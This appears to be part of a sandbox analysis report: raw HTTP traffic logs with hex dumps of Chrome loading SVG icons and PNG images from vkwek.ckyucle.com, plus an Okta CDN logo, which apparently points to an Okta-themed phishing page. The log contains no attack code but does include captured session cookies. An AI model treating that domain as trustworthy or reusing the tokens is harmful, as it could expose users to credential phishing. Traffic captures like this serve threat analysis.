                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:08 UTC657INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:08 GMT
                                                              Content-Type: image/svg+xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=emZ5L1L%2B8vb5xMt3yfRDCJcQO7DNrZ6IaGldstT%2BE6niVy6ADk%2BeOjk6TEKdBVXxuR36JREno4fqu%2B%2Basmu7V7LZ%2FODmu%2BZDAXf7vmWvmjVawaeo0%2B6G7o9UDXPGGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b3e5ffd8ce6-EWR
                                                              2024-07-03 07:41:08 UTC712INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                              Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                              2024-07-03 07:41:08 UTC1369INData Raw: 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c 30 2c 30 2c 31 2c 31 2e 35 34 32 2c 31 2e 31 35
                                                              Data Ascii: ,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15
                                                              2024-07-03 07:41:08 UTC831INData Raw: 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 34 35 41 31 31 2e 32 39 33 2c 31
                                                              Data Ascii: 309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-.279-.645A11.293,1
                                                              2024-07-03 07:41:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              66192.168.2.662949188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:08 UTC1134OUTGET /ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:08 UTC667INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:08 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 1400
                                                              Connection: close
                                                              Content-Disposition: inline; filename="ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BypakrTcH273F8aDdWjpG57VH%2BchDy55odWl%2FZObRjq9fb2CLQhEirDGN%2BjMsGUfTk2qomvAqjT3y%2FAKpslZJUFxQ4M0a8yC6q483KgAib3Ai3eiicuvPLNrHEm3qw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b3e8cb132ca-EWR
                                                              2024-07-03 07:41:08 UTC702INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                              Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                              2024-07-03 07:41:08 UTC698INData Raw: 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15 2d f7 03 01 73 a0 ff ad
                                                              Data Ascii: Ite~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$-s


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              67192.168.2.662950188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:08 UTC1119OUTGET /rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:08 UTC579INHTTP/1.1 404 Not Found
                                                              Date: Wed, 03 Jul 2024 07:41:08 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNr7K31YxCybawgO8UcrvC9KOG8x01hj10z4d6VsyJz8tdqSzuEzr2ucdsLTt4o9vVVqnxpyXDz3viB292rO%2Bl2gk1mmsmQNNxMEte%2FgZ9AQMb3D4NGU2dlpMIR%2FQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b3eafe68c36-EWR
                                                              2024-07-03 07:41:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              68192.168.2.66294713.33.187.684434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:08 UTC611OUTGET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1
                                                              Host: ok4static.oktacdn.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:08 UTC685INHTTP/1.1 200 OK
                                                              Content-Type: image/png
                                                              Content-Length: 10796
                                                              Connection: close
                                                              Date: Sun, 16 Jun 2024 04:04:47 GMT
                                                              Server: nginx
                                                              Last-Modified: Tue, 23 Feb 2021 04:20:08 GMT
                                                              ETag: "12bdacc832185d0367ecc23fd24c86ce"
                                                              Expires: Mon, 16 Jun 2025 04:04:47 GMT
                                                              Cache-Control: max-age=31536000
                                                              Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                              Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                              Access-Control-Allow-Origin: *
                                                              Accept-Ranges: bytes
                                                              X-Cache: Hit from cloudfront
                                                              Via: 1.1 9bd2938ceb90e1a35f549d1165e84676.cloudfront.net (CloudFront)
                                                              X-Amz-Cf-Pop: FRA60-P9
                                                              X-Amz-Cf-Id: c8Iq5WvygRwCCiKmMmnouc1ClPyvJI0-nMRC7_Mgdz8V-__60G5KLQ==
                                                              Age: 1481781
                                                              2024-07-03 07:41:08 UTC10796INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a4 00 00 00 5e 08 06 00 00 00 6c 32 60 fe 00 00 29 f3 49 44 41 54 78 da ed 7d 09 9c 1c 55 9d ff a0 8b 20 77 a6 eb bd 1a 42 10 10 50 24 8a 48 76 09 c9 74 d5 ab ea 09 91 b8 a0 78 84 45 41 40 04 51 60 81 45 14 d0 15 02 88 c8 2d ec 8a 9c 22 97 28 e7 9f e5 58 60 89 11 44 2e c3 11 c8 35 5d 5d 55 7d cd 95 c9 9d 90 83 24 33 ff df af aa 26 e9 cc bc d7 67 75 4f 77 cf fb 7d 3e ef 13 98 99 ae 7e f5 8e df f7 77 ff 5a 5a 9a 84 12 7a eb be 96 d6 46 5a 24 49 92 24 49 92 a4 d1 a0 b8 4e fe b3 c7 a4 9d 09 9d ac 74 74 b2 24 65 90 c5 09 4d f9 c5 bc e9 ea ae 72 75 24 49 92 24 49 52 d5 68 81 41 76 4b 30 c5 74 19 b9 77 79 87 3a 98 31 e8 a0 a5 93 c1 44 ce 48 c3 cf d6 4c 53 07 01 98 92 69 46 7e b6 58 8f c4 e0 73 6d 72 f5 24
                                                              Data Ascii: PNGIHDR^l2`)IDATx}U wBP$HvtxEA@Q`E-"(X`D.5]]U}$3&guOw}>~wZZzFZ$I$INtt$eMru$I$IRhAvK0twy:1DHLSiF~Xsmr$


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              69192.168.2.662951188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:09 UTC1122OUTGET /opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:09 UTC665INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:09 GMT
                                                              Content-Type: image/svg+xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kj8RsJDZ5MP8r9AFbd0mCYTsuevF4L%2B6YgA%2BHB9a337nFvLsNBTd8XtUKU0xYfCyx%2B8oxReKiGMchg0%2ByK3Ub%2FkdDq7KxdpMmzUnm8g0GW3xkvfiEhlT2ciJ0LdjJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b444ab60c7e-EWR
                                                              2024-07-03 07:41:09 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                              Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                              2024-07-03 07:41:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              70192.168.2.662961188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:09 UTC1108OUTGET /uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:09 UTC640INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:09 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 231
                                                              Connection: close
                                                              Content-Disposition: inline; filename="uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=22Ck5q9dSpGBZgomuZXB5ARb5vpSq8Pk8a6QjdJW%2B9aevR%2FPrdnx%2F59o8PQs5lc9gFHToh%2B9zEmKujKa3nSrdZ0HHmVWLpin0lpFS2H94qONiPmv5nmSc0omcbi%2Blw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b459e1b0ca0-EWR
                                                              2024-07-03 07:41:09 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                              Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
